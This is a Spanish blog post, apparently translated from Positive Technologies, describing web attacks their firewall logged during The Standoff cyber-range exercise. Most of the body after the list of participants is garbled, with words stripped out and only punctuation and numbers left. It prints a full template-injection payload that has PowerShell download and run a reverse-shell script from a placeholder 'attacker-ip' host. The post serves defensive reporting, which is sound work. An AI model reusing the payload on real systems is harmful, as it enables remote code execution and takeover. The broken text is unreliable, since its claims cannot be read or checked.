En el último The Standoff, nosotros, el equipo del PT Expert Security Center , en paralelo con los participantes en el enfrentamiento desde el lado de la defensa, monitoreamos la infraestructura del sitio y las oficinas individuales de la copia digital de la metrópoli desplegada en nuestro ciberpolígono. Para ello, desplegamos un centro de operaciones de seguridad adicional (SOC) , que, por así decirlo, cubría toda la infraestructura, por lo que “vio” todas las actividades de los participantes de The Standoff e incluso un poco más. Una de las herramientas de este SOC fue PT Application Firewall , un firewall de capa de aplicación web (lea sobre los resultados del trabajo de otra de nuestras herramientas SOC, PT Sandbox, en uno de nuestros artículos anteriores). A continuación, nos centraremos exclusivamente en lo que sucedió en el sitio desde el punto de vista de la web y qué objetivos eligieron los equipos atacantes.
Estadísticas generales de ataques
Como parte de The Standoff, monitoreamos los ataques en el propio portal del sitio, así como en 30 recursos web incluidos en la infraestructura de juegos del campo de entrenamiento. Estos fueron recursos utilizados tanto en el juego principal (Meters of the 25 Hours office, un recurso para transmitir lecturas de medidores, Consul for Nuft, una plataforma de gestión de servicios, que se discutirá a continuación) como en la recompensa de errores (por ejemplo, CMS Umbraco para Bank of FF, Mantis Bugtracker for 25 Hours es un sistema de seguimiento de errores para productos de software, rConfir RCE es un servicio de administración de configuración de red para Big Bro Group). Los equipos de lectura recibieron puntos por implementar riesgos, así como por buscar vulnerabilidades en sistemas e informes.
Quién era quién en el ciberpolígono:
- Heavy Ship Logistics — , , , ;
- 25 Hours — , , , ;
- Tube — , , , ;
- Nuft — , ;
- Big Bro Group — ;
- Bank of FF — .
— , . — , bug bounty, «» , . 13. bug bounty . «», (, RCE Flack BookStore SQL Injection — capture the flag). 29 30 - ( , ). , , web application firewall.
The Standoff PT Application Firewall — .
. 1 . , — , — , — . , , . .
( The Standoff 12:00 12 14:00 17 ).
, PT Application Firewall, , , , . . , , , . , .
ube Bank of FF: CMS Made Simple (CMS), bbord ( ), CMS Umbraco, Prestoshop ( ), Avideo encoder ( ), FHEM tomcat ( ), Consul, openEMR ( ), ATutor ( ) rConfig.
. nmap Burp Suite Python Go: Metasploit. burp suite, Metasploit, Responder-.
30 , , , 5 6 2 6 . , — , .
.
« 25 Hours» Meters. , . HubL, {{}} . , , . : {{7*7}} , 7*7.
:
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval("var x=new java.lang.ProcessBuilder(\"cmd.exe\",\"/c\",\"powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://attacker-ip/mini-reverse.ps1');\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())")}}.
.
, (, ), ( ) .
— , Nuft Consul. . Server Side Request Forgery, Gopher PUT .
200 .
, ( — ) ( — ).
( false positive) . .
proofs of concept , . , , , .
, CMS Umbraco ( Bank of FF) , - POST; .
, Meters, , — .
request path .
30 . , . . , (ODBC) backup «» .
, ( The Standoff) , , . web application firewall. PT Application Firewall , . , false positive , .
Positive Technologies (PT Expert Security Center)